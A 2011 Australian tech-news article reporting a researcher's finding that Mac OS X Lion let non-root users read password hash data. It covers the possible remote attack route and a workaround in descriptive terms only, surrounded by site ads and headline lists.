Enjoy the freedom to innovate and grow your business
[ad] With Microsoft Azure you have hybrid cloud flexibility, allowing your platform to span your cloud and on premise data centre. Learn more at microsoftcloud.com.
IT Admin: No Time to Save Time?
[ad] Do you spend too much time patching machines or cleaning up after virus attacks? With automation controlled from a central IT management console accessible anytime, anywhere – you can save time for bigger tasks. Try simple IT management from GFI Cloud and start saving time today!
Free Forrester analysis of CRM solutions
[ad] In this 25 page report, independent analyst house Forrester evaluates 18 significant products in the customer relationship management space from a broad range of vendors, detailing its findings on how CRM suites measure up and plotting where they stand in relation to each other. Download it for free now.
Great articles on other sites
- Susan Sly quits AEMO
- David Gee departs Credit Union Australia
- Former Jetstar CIO picks up new gig
- Bitcoin goes retail with Westfield ATM
- Turnbull too quick to abandon faster, smarter broadband service
- NBN hypocrisy confirms contempt for process
- Turnbull walks away from NBN high ground claims
- Costs must be fixed first in piracy solution: Comms Alliance
- NAB deploys Chaos Monkey to kill servers 24/7
- History won't judge Turnbull's governance-free NBN kindly
Reader giveaway: Google Nexus 5
We’re big fans of Google’s Nexus line-up in general at Delimiter towers. Nexus 4, Nexus 7, Nexus 10 … we love pretty much anything Nexus. Because of this we've kicked off a new competition to give away one of Google’s new Nexus 5 smartphones to a lucky reader. Click here to enter.
News - Written by Renai LeMay on Monday, September 26, 2011 12:36 - 29 Comments
Aussie researcher cracks OS X Lion passwords
news An Australian security expert respected for his work testing the defences of Apple software has published a method which appears to allow an attacker to break through the password defences of Cupertino’s latest Max OS X Lion operating system.
According to his LinkedIn profile, Patrick Dunstan is currently an information security specialist at the University of Adelaide, although he also works as a guest lecturer at the University of South Australia. Dunstan had previously attracted attention in late 2009 with a blog post explaining how a user who had already gained access to a Mac OS X system could extract a user’s password on that system.
In a new blog post this week — first reported by Secure Computing Magazine last week — Dunstan published an update to his technique. However, this time around he discovered a startling new fact with respect to Lion’s security protection — according to the researcher it leaves a crucial step out which could allow remote access to user passwords on the system.
In previous versions of Mac OS X, in order to access a users’ password, an attacker would need to break into what is referred to in Unix-based operating systems (such as Mac OS X) as a ‘shadow’ file — a file which stores critical data but can only be accessed by users with a high privilege — such as root access.
“So for all modern OS X platforms (Tiger, Leopard, Snow Leopard and Lion) each user has their own shadow file (hash database) whose data is accessible only by the root user … or at least it should be,” wrote Dunstan in his post. “It appears in the redesign of OS X Lion’s authentication scheme a critical step has been overlooked. Whilst non-root users are unable to access the shadow files directly, Lion actually provides non-root users the ability to still view password hash data.”
This means, according to the researcher, that it might be possible for an attacker to crack a users’ Lion password by attacking their system through a Java app hosted online. The attack vector would still require the owner of the computer running Mac OS X to allow the Java app to run — but it is possible.
Dunstan noted that due, no doubt, to Lion’s relatively short time being available for use, he could not find any major cracking software supporting the ability to crack encrypted passwords in the operating system — but he has published a simple script which allows users to do so. It is not yet clear whether Apple is aware of the issue, but a temporary workaround allows users to secure their system through setting different permissions on a certain file.
The news comes as Mac OS X continues to be subject to fewer security attacks than Microsoft Windows. Security researchers have stated in the past that there could be a number of reasons for the appearance of heightened security on the Apple platform, ranging from its Unix basis, which allows a high degree of fine-grained permissions to be used on files and applications, to the relative dominance of Windows in the desktop PC market.
However, researchers have also speculated that attacks on Mac OS X could increase in future, along with the platform’s growing popularity and use on mobile devices such as iPhone and iPads.
As this attack would likely require a user to allow an application to run on their system before it could succeed, I would regard it as less dangerous than many other security headaches out there, which would require no support from a user. However, what Dunstan’s blog post demonstrates is that Mac OS X is not inherently safe from security problems. They do exist on the Mac; and I’m sure we’ll see more of them as time goes on; especially aimed at devices such as iPads.
Image credit: Apple
Enterprise IT, News - Apr 17, 2014 16:39 - 0 Comments
More In Enterprise IT
- WA Health told: Hire a goddamn CIO already
- Former whole of Qld Govt CIO Grant resigns
- Hills dumped $18m ERP/CRM rollout for Salesforce.com
- Dropbox opens Sydney office
- Heartbleed, internal outages: CBA’s horror 24 hours
News, Telecommunications - Apr 17, 2014 11:01 - 134 Comments
More In Telecommunications
- CBN FTTN test shows speeds of 105Mbps
- “Labor mindset”: Turnbull denies cost/benefit hypocrisy
- One.Tel saga finally concluded
- NBN Co’s Telstra bill may be $98 billion
- NBN Co to kill TPG rollout while Minister dithers
More In Industry
- Hackett takes 40 percent UltraServe stake
- Tesla Model S may come to Australia shortly
- Equinix expands third Sydney datacentre
- Atlassian sells US$150m stock to US funds
- NSW Govt directly regulates taxi mobile apps
Digital Rights, News - Apr 17, 2014 12:41 - 14 Comments
More In Digital Rights
- NAB’s Bitcoin ban a symptom of the digital currency threat
- Europe says no to data retention, so why is it an option in Australia?
- House Foxtel: Unbowed, Unbent and Unreasonable
- Once again, Australia sets new Game of Thrones piracy record
- Website blocks, court orders, three strikes: Rights holders want it all